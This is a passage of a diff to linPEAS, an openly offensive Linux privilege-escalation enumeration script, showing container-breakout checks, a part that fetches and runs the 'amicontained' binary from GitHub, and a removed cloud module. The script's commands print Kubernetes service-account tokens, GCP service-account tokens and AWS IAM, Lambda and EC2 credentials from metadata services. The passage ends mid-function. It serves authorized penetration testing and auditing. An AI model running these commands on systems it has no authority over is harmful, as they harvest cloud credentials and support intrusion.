    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.html"
    checkProcSysBreakouts
    print_list "/proc mounted? ................. $proc_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    print_list "/dev mounted? .................. $dev_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    print_list "Run unshare .................... $run_unshare\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "release_agent breakout 1........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "release_agent breakout 2........ $release_agent_breakout2\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    print_list "release_agent breakout 3........ $release_agent_breakout3\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    print_list "binfmt_misc breakout ........... $binfmt_misc_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    print_list "uevent_helper breakout ......... $uevent_helper_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    # Additional mount checks
    print_list "Docker socket mounted? ......... "$NC
    (mount | grep -E "docker.sock|/var/run/docker.sock" || echo "No") | sed -${E} "s,Yes|docker.sock,${SED_RED},"
    print_list "Common host filesystem mounted?  "$NC
    (mount | grep -E "host|/host|/mnt/host" || echo "No") | sed -${E} "s,Yes|host,${SED_RED},"
    print_list "Interesting mounts ............. "$NC
    mount | grep -E "docker|container|overlay|kubelet" | grep -v "proc" | sed -${E} "s,docker.sock|host|privileged,${SED_RED},g"
    # Check for writable mount points
    print_list "Writable mount points ......... "$NC
    mount | grep -E "rw," | grep -v "ro," | sed -${E} "s,docker.sock|host|privileged,${SED_RED},g"
    # Check for shared mount points
    print_list "Shared mount points ........... "$NC
    mount | grep -E "shared|slave" | sed -${E} "s,docker.sock|host|privileged,${SED_RED},g"
    # Capability checks
    print_3title "Capability Checks"
    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/capabilities-abuse-escape.html"
    print_list "Dangerous capabilities ......... "$NC
    if [ "$(command -v capsh || echo -n '')" ]; then 
        capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g"
    else
        defautl_docker_caps="00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap"
        cat /proc/self/status | tr '\t' ' ' | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s/00000000a80425fb/$defautl_docker_caps/g" | sed -${E} "s,0000000000000000|00000000a80425fb,${SED_GREEN},g"
        echo $ITALIC"Run capsh --decode=<hex> to decode the capabilities"$NC
    fi
    # Additional capability checks
    print_list "Dangerous syscalls allowed ... "$NC
    if [ -f "/proc/sys/kernel/yama/ptrace_scope" ]; then
        (cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo "Not found") | sed -${E} "s,0,${SED_RED},"
    else
        echo "Not found"
    fi
    # Namespace checks
    print_3title "Namespace Checks"
    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/namespaces/index.html"
    print_list "Current namespaces ............. "$NC
    ls -l /proc/self/ns/
    print_list "Host network namespace? ........ "$NC
    if [ "$(ip netns list 2>/dev/null)" ]; then
        echo "Yes - Host network namespace accessible" | sed -${E} "s,Yes,${SED_RED},"
    else
        echo "No"
    fi
    # Additional namespace checks
    print_list "Host IPC namespace? ........... "$NC
    if [ "$(ls -l /proc/self/ns/ipc 2>/dev/null)" = "$(ls -l /proc/1/ns/ipc 2>/dev/null)" ]; then
        echo "Yes - Host IPC namespace shared" | sed -${E} "s,Yes,${SED_RED},"
    else
        echo "No"
    fi
    print_list "Host PID namespace? ........... "$NC
    if [ "$(ls -l /proc/self/ns/pid 2>/dev/null)" = "$(ls -l /proc/1/ns/pid 2>/dev/null)" ]; then
        echo "Yes - Host PID namespace shared" | sed -${E} "s,Yes,${SED_RED},"
    else
        echo "No"
    fi
    print_list "Host UTS namespace? ........... "$NC
    if [ "$(ls -l /proc/self/ns/uts 2>/dev/null)" = "$(ls -l /proc/1/ns/uts 2>/dev/null)" ]; then
        echo "Yes - Host UTS namespace shared" | sed -${E} "s,Yes,${SED_RED},"
    else
        echo "No"
    fi
    # Additional breakout vectors
    print_3title "Additional Breakout Vectors"
    print_list "is modprobe present ............ $modprobe_present\n" | sed -${E} "s,/.*,${SED_RED},"
    print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E} "s,Yes,${SED_RED},"
    # Check for container escape tools in PATH
    print_list "Container escape tools in PATH . "$NC
    (which nsenter 2>/dev/null || which unshare 2>/dev/null || which chroot 2>/dev/null || which capsh 2>/dev/null || which setcap 2>/dev/null || which getcap 2>/dev/null || echo "No") | sed -${E} "s,nsenter|unshare|chroot|capsh|setcap|getcap,${SED_RED},g"
    print_3title "Extra Breakout Vectors"
    print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "/proc/self/mem readable ........ $self_mem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "/proc/kcore readable ........... $kcore_readable\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "/proc/kmem readable ............ $kmem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "/proc/kmem writable ............ $kmem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "/proc/mem writable ............. $mem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "/sys/kernel/vmcoreinfo readable  $vmcoreinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "/sys/firmware/efi/vars writable  $efi_vars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
    # Additional kernel checks
    print_list "Kernel version .............. "$NC
    uname -a | sed -${E} "s,$(uname -r),${SED_RED},"
    print_list "Kernel modules ............. "$NC
    lsmod | grep -E "overlay|aufs|btrfs|device_mapper|floppy|loop|squashfs|udf|veth|vbox|vmware|kvm|xen|docker|containerd|runc|crio" | sed -${E} "s,overlay|aufs|btrfs|device_mapper|floppy|loop|squashfs|udf|veth|vbox|vmware|kvm|xen|docker|containerd|runc|crio,${SED_RED},g"
    # Additional container runtime checks
    print_list "Container runtime sockets .. "$NC
    (find /var/run -name "*.sock" 2>/dev/null | grep -E "docker|containerd|crio|podman|lxc|rkt" || echo "No") | sed -${E} "s,docker|containerd|crio|podman|lxc|rkt,${SED_RED},g"
    print_list "Container runtime configs .. "$NC
    (find /etc -name "*.conf" -o -name "*.json" 2>/dev/null | grep -E "docker|containerd|crio|podman|lxc|rkt" || echo "No") | sed -${E} "s,docker|containerd|crio|podman|lxc|rkt,${SED_RED},g"
    # Kubernetes specific checks
    if echo "$containerType" | grep -qi "kubernetes"; then
        print_3title "Kubernetes Specific Checks"
        print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html"
        print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /var/run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n"
        print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /var/run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n"
        print_list "Kubernetes service account folder" | sed -${E} "s,.*,${SED_RED},"
        ls -lR /run/secrets/kubernetes.io/ /var/run/secrets/kubernetes.io/ /secrets/kubernetes.io/ 2>/dev/null
        print_list "Kubernetes env vars" | sed -${E} "s,.*,${SED_RED},"
        (env | set) | grep -Ei "kubernetes|kube" | grep -Ev "^WF=|^Wfolders=|^mounted=|^USEFUL_SOFTWARE='|^INT_HIDDEN_FILES=|^containerType="
        print_list "Current sa user k8s permissions" | sed -${E} "s,.*,${SED_RED},"
        kubectl auth can-i --list 2>/dev/null || curl -s -k -d "$(echo \"eyJraW5kIjoiU2VsZlN1YmplY3RSdWxlc1JldmlldyIsImFwaVZlcnNpb24iOiJhdXRob3JpemF0aW9uLms4cy5pby92MSIsIm1ldGFkYXRhIjp7ImNyZWF0aW9uVGltZXN0YW1wIjpudWxsfSwic3BlYyI6eyJuYW1lc3BhY2UiOiJlZXZlZSJ9LCJzdGF0dXMiOnsicmVzb3VyY2VSdWxlcyI6bnVsbCwibm9uUmVzb3VyY2VSdWxlcyI6bnVsbCwiaW5jb21wbGV0ZSI6ZmFsc2V9fQo=\"|base64 -d)" \
          "https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \
            -X 'POST' -H 'Content-Type: application/json' \
            --header "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" | sed "s,secrets|exec|create|patch|impersonate|\"*\",${SED_RED},"
        # Additional Kubernetes checks
        print_list "Kubernetes API server ...... "$NC
        (curl -s -k https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/version 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN},"
        print_list "Kubernetes secrets ......... "$NC
        (kubectl get secrets 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN},"
        print_list "Kubernetes pods ............ "$NC
        (kubectl get pods 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN},"
        print_list "Kubernetes services ........ "$NC
        (kubectl get services 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN},"
        print_list "Kubernetes nodes ........... "$NC
        (kubectl get nodes 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN},"
    fi
    # Interesting files and mounts
    print_3title "Interesting Files & Mounts"
    print_list "Interesting files mounted ........ "$NC
    (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" | sed -${E} "s,.sock,${SED_RED}," | sed -${E} "s,docker.sock,${SED_RED_YELLOW}," | sed -${E} "s,/dev/,${SED_RED},g"
    print_list "Possible entrypoints ........... "$NC
    ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq
    echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/2_container/6_Am_I_contained.sh
+++ b/linPEAS/builder/linpeas_parts/2_container/6_Am_I_contained.sh
@ -0,0 +1,20 @@
 # Title: Container - Am I Containered 
 # ID: CT_Am_I_contained
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Am I Containered tool
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, execBin
 # Global Variables:
 # Initial Functions:
 # Generated Global Variables: $FAT_LINPEAS_AMICONTAINED
 # Fat linpeas: 1
 # Small linpeas: 0
 if [ "$$FAT_LINPEAS_AMICONTAINED" ]; then
  print_2title "Am I Containered?"
  FAT_LINPEAS_AMICONTAINED="peass{https://github.com/genuinetools/amicontained/releases/latest/download/amicontained-linux-amd64}"
  execBin "AmIContainered" "https://github.com/genuinetools/amicontained" "$FAT_LINPEAS_AMICONTAINED"
 fi
--- a/linPEAS/builder/linpeas_parts/3_cloud.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud.sh
@ -1,504 +0,0 @@
 ###########################################
 #-----------) Cloud functions (-----------#
 ###########################################
 GCP_GOOD_SCOPES="/devstorage.read_only|/logging.write|/monitoring|/servicecontrol|/service.management.readonly|/trace.append"
 GCP_BAD_SCOPES="/cloud-platform|/compute"
 exec_with_jq(){
  if [ "$(command -v jq)" ]; then 
    $@ | jq 2>/dev/null;
    if ! [ $? -eq 0 ]; then
      $@;
    fi
   else 
    $@;
   fi
 }
 check_gcp(){
  is_gcp="No"
  if grep -q metadata.google.internal /etc/hosts 2>/dev/null || (curl --connect-timeout 2 metadata.google.internal >/dev/null 2>&1 && [ "$?" -eq "0" ]) || (wget --timeout 2 --tries 1 metadata.google.internal >/dev/null 2>&1 && [ "$?" -eq "0" ]); then
    is_gcp="Yes"
  fi
 }
 check_do(){
  is_do="No"
  if [ -f "/etc/cloud/cloud.cfg.d/90-digitalocean.cfg" ]; then
    is_do="Yes"
  fi
 }
 check_ibm_vm(){
  is_ibm_vm="No"
  if grep -q "nameserver 161.26.0.10" "/etc/resolv.conf" && grep -q "nameserver 161.26.0.11" "/etc/resolv.conf"; then
    curl --connect-timeout 2  "http://169.254.169.254" > /dev/null 2>&1 || wget --timeout 2 --tries 1  "http://169.254.169.254" > /dev/null 2>&1
    if [ "$?" -eq 0 ]; then
      IBM_TOKEN=$( ( curl -s -X PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01" -H "Metadata-Flavor: ibm" -H "Accept: application/json" 2> /dev/null | cut -d '"' -f4 ) || ( wget --tries 1 -O - --method PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01" --header "Metadata-Flavor: ibm" --header "Accept: application/json" 2>/dev/null | cut -d '"' -f4 ) )
      is_ibm_vm="Yes"
    fi
  fi
 }
 check_aws_ecs(){
  is_aws_ecs="No"
  if (env | grep -q ECS_CONTAINER_METADATA_URI_v4); then
    is_aws_ecs="Yes";
    aws_ecs_metadata_uri=$ECS_CONTAINER_METADATA_URI_v4;
    aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
  elif (env | grep -q ECS_CONTAINER_METADATA_URI); then
    is_aws_ecs="Yes";
    aws_ecs_metadata_uri=$ECS_CONTAINER_METADATA_URI;
    aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
  elif (env | grep -q AWS_CONTAINER_CREDENTIALS_RELATIVE_URI); then
    is_aws_ecs="Yes";
  fi
  if [ "$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" ]; then
    aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
  fi
 }
 check_aws_ec2(){
  is_aws_ec2="No"
  is_aws_ec2_beanstalk="No"
  if [ -d "/var/log/amazon/" ]; then
    is_aws_ec2="Yes"
    EC2_TOKEN=$(curl --connect-timeout 2 -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget --timeout 2 --tries 1 -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
  else
    EC2_TOKEN=$(curl --connect-timeout 2 -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget --timeout 2 --tries 1 -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
    if [ "$(echo $EC2_TOKEN | cut -c1-2)" = "AQ" ]; then
      is_aws_ec2="Yes"
    fi
  fi
  if [ "$is_aws_ec2" = "Yes" ] && grep -iq "Beanstalk" "/etc/motd"; then
    is_aws_ec2_beanstalk="Yes"
  fi
 }
 check_aws_lambda(){
  is_aws_lambda="No"
  if (env | grep -q AWS_LAMBDA_); then
    is_aws_lambda="Yes"
  fi
 }
 check_aws_codebuild(){
  is_aws_codebuild="No"
  if [ -f "/codebuild/output/tmp/env.sh" ] && grep -q "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" "/codebuild/output/tmp/env.sh" ; then
    is_aws_codebuild="Yes"
  fi
 }
 check_az_vm(){
  is_az_vm="No"
  if [ -d "/var/log/azure/" ]; then
    is_az_vm="Yes"
  elif cat /etc/resolv.conf 2>/dev/null | grep -q "search reddog.microsoft.com"; then
    is_az_vm="Yes"
  fi
 }
 check_az_app(){
  is_az_app="No"
  if [ -d "/opt/microsoft" ] && env | grep -q "IDENTITY_ENDPOINT"; then
    is_az_app="Yes"
  fi
 }
 check_gcp
 print_list "Google Cloud Platform? ............... $is_gcp\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 check_aws_ecs
 print_list "AWS ECS? ............................. $is_aws_ecs\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 check_aws_ec2
 print_list "AWS EC2? ............................. $is_aws_ec2\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 print_list "AWS EC2 Beanstalk? ................... $is_aws_ec2_beanstalk\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 check_aws_lambda
 print_list "AWS Lambda? .......................... $is_aws_lambda\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 check_aws_codebuild
 print_list "AWS Codebuild? ....................... $is_aws_codebuild\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 check_do
 print_list "DO Droplet? .......................... $is_do\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 check_ibm_vm
 print_list "IBM Cloud VM? ........................ $is_ibm_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 check_az_vm
 print_list "Azure VM? ............................ $is_az_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 check_az_app
 print_list "Azure APP? ........................... $is_az_app\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 echo ""
 if [ "$is_gcp" = "Yes" ]; then
    gcp_req=""
    if [ "$(command -v curl)" ]; then
        gcp_req='curl -s -f  -H "X-Google-Metadata-Request: True"'
    elif [ "$(command -v wget)" ]; then
        gcp_req='wget -q -O - --header "X-Google-Metadata-Request: True"'
    else 
        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
    fi
    if [ "$gcp_req" ]; then
        print_2title "Google CLoud Platform Enumeration"
        print_info "https://book.hacktricks.xyz/cloud-security/gcp-security"
        ## GC Project Info
        p_id=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/project-id')
        [ "$p_id" ] && echo "Project-ID: $p_id"
        p_num=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id')
        [ "$p_num" ] && echo "Project Number: $p_num"
        pssh_k=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/ssh-keys')
        [ "$pssh_k" ] && echo "Project SSH-Keys: $pssh_k"
        p_attrs=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true')
        [ "$p_attrs" ] && echo "All Project Attributes: $p_attrs"
        # OSLogin Info
        osl_u=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/users)
        [ "$osl_u" ] && echo "OSLogin users: $osl_u"
        osl_g=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/groups)
        [ "$osl_g" ] && echo "OSLogin Groups: $osl_g"
        osl_sk=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/security-keys)
        [ "$osl_sk" ] && echo "OSLogin Security Keys: $osl_sk"
        osl_au=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/authorize)
        [ "$osl_au" ] && echo "OSLogin Authorize: $osl_au"
        # Instance Info
        inst_d=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/description)
        [ "$inst_d" ] && echo "Instance Description: "
        inst_hostn=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/hostname)
        [ "$inst_hostn" ] && echo "Hostname: $inst_hostn"
        inst_id=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/id)
        [ "$inst_id" ] && echo "Instance ID: $inst_id"
        inst_img=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/image)
        [ "$inst_img" ] && echo "Instance Image: $inst_img"
        inst_mt=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/machine-type)
        [ "$inst_mt" ] && echo "Machine Type: $inst_mt"
        inst_n=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/name)
        [ "$inst_n" ] && echo "Instance Name: $inst_n"
        inst_tag=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/scheduling/tags)
        [ "$inst_tag" ] && echo "Instance tags: $inst_tag"
        inst_zone=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/zone)
        [ "$inst_zone" ] && echo "Zone: $inst_zone"
        inst_k8s_loc=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-location")
        [ "$inst_k8s_loc" ] && echo "K8s Cluster Location: $inst_k8s_loc"
        inst_k8s_name=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-name")
        [ "$inst_k8s_name" ] && echo "K8s Cluster name: $inst_k8s_name"
        inst_k8s_osl_e=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/enable-oslogin")
        [ "$inst_k8s_osl_e" ] && echo "K8s OSLoging enabled: $inst_k8s_osl_e"
        inst_k8s_klab=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-labels")
        [ "$inst_k8s_klab" ] && echo "K8s Kube-labels: $inst_k8s_klab"
        inst_k8s_kubec=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kubeconfig")
        [ "$inst_k8s_kubec" ] && echo "K8s Kubeconfig: $inst_k8s_kubec"
        inst_k8s_kubenv=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env")
        [ "$inst_k8s_kubenv" ] && echo "K8s Kube-env: $inst_k8s_kubenv"
        echo ""
        print_3title "Interfaces"
        for iface in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/"); do 
            echo "  IP: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/ip")
            echo "  Subnetmask: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask")
            echo "  Gateway: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/gateway")
            echo "  DNS: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers")
            echo "  Network: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/network")
            echo "  ==============  "
        done
        echo ""
        print_3title "User Data"
        echo $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script")
        echo ""
        echo ""
        print_3title "Service Accounts"
        for sa in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"); do 
            echo "  Name: $sa"
            echo "  Email: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/email")
            echo "  Aliases: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/aliases")
            echo "  Identity: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/identity")
            echo "  Scopes: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/scopes") | sed -${E} "s,${GCP_GOOD_SCOPES},${SED_GREEN},g" | sed -${E} "s,${GCP_BAD_SCOPES},${SED_RED},g"
            echo "  Token: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/token")
            echo "  ==============  "
        done
    fi
 fi
 if [ "$is_aws_ecs" = "Yes" ]; then
    print_2title "AWS ECS Enumeration"
    aws_ecs_req=""
    if [ "$(command -v curl)" ]; then
        aws_ecs_req='curl -s -f'
    elif [ "$(command -v wget)" ]; then
        aws_ecs_req='wget -q -O -'
    else 
        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
    fi
    if [ "$aws_ecs_metadata_uri" ]; then
        print_3title "Container Info"
        exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri"
        echo ""
        print_3title "Task Info"
        exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri/task"
        echo ""
    else
        echo "I couldn't find ECS_CONTAINER_METADATA_URI env var to get container info"
    fi
    if [ "$aws_ecs_service_account_uri" ]; then
        print_3title "IAM Role"
        exec_with_jq eval $aws_ecs_req "$aws_ecs_service_account_uri"
        echo ""
    else
        echo "I couldn't find AWS_CONTAINER_CREDENTIALS_RELATIVE_URI env var to get IAM role info (the task is running without a task role probably)"
    fi
 fi
 if [ "$is_aws_ec2" = "Yes" ]; then
    print_2title "AWS EC2 Enumeration"
    HEADER="X-aws-ec2-metadata-token: $EC2_TOKEN"
    URL="http://169.254.169.254/latest/meta-data"
    aws_req=""
    if [ "$(command -v curl)" ]; then
        aws_req="curl -s -f -H '$HEADER'"
    elif [ "$(command -v wget)" ]; then
        aws_req="wget -q -O - -H '$HEADER'"
    else 
        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
    fi
    if [ "$aws_req" ]; then
        printf "ami-id: "; eval $aws_req "$URL/ami-id"; echo ""
        printf "instance-action: "; eval $aws_req "$URL/instance-action"; echo ""
        printf "instance-id: "; eval $aws_req "$URL/instance-id"; echo ""
        printf "instance-life-cycle: "; eval $aws_req "$URL/instance-life-cycle"; echo ""
        printf "instance-type: "; eval $aws_req "$URL/instance-type"; echo ""
        printf "region: "; eval $aws_req "$URL/placement/region"; echo ""
        echo ""
        print_3title "Account Info"
        exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/info"; echo ""
        echo ""
        print_3title "Network Info"
        for mac in $(eval $aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do 
          echo "Mac: $mac"
          printf "Owner ID: "; eval $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo ""
          printf "Public Hostname: "; eval $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo ""
          printf "Security Groups: "; eval $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo ""
          echo "Private IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo ""
          printf "Subnet IPv4: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo ""
          echo "PrivateIPv6s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo ""
          printf "Subnet IPv6: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo ""
          echo "Public IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo ""
          echo ""
        done
        echo ""
        print_3title "IAM Role"
        exec_with_jq eval $aws_req "$URL/iam/info"; echo ""
        for role in $(eval $aws_req "$URL/iam/security-credentials/" 2>/dev/null); do 
          echo "Role: $role"
          exec_with_jq eval $aws_req "$URL/iam/security-credentials/$role"; echo ""
          echo ""
        done
        echo ""
        print_3title "User Data"
        eval $aws_req "http://169.254.169.254/latest/user-data"; echo ""
        echo ""
        echo "EC2 Security Credentials"
        exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/security-credentials/ec2-instance"; echo ""
        print_3title "SSM Runnig"
        ps aux 2>/dev/null | grep "ssm-agent" | grep -v "grep" | sed "s,ssm-agent,${SED_RED},"
    fi
 fi
 if [ "$is_aws_lambda" = "Yes" ]; then
  print_2title "AWS Lambda Enumeration"
  printf "Function name: "; env | grep AWS_LAMBDA_FUNCTION_NAME
  printf "Region: "; env | grep AWS_REGION
  printf "Secret Access Key: "; env | grep AWS_SECRET_ACCESS_KEY
  printf "Access Key ID: "; env | grep AWS_ACCESS_KEY_ID
  printf "Session token: "; env | grep AWS_SESSION_TOKEN
  printf "Security token: "; env | grep AWS_SECURITY_TOKEN
  printf "Runtime API: "; env | grep AWS_LAMBDA_RUNTIME_API
  printf "Event data: "; (curl -s "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" 2>/dev/null || wget -q -O - "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next")
 fi
 if [ "$is_aws_codebuild" = "Yes" ]; then
  print_2title "AWS Codebuild Enumeration"
  aws_req=""
  if [ "$(command -v curl)" ]; then
      aws_req="curl -s -f"
  elif [ "$(command -v wget)" ]; then
      aws_req="wget -q -O -"
  else 
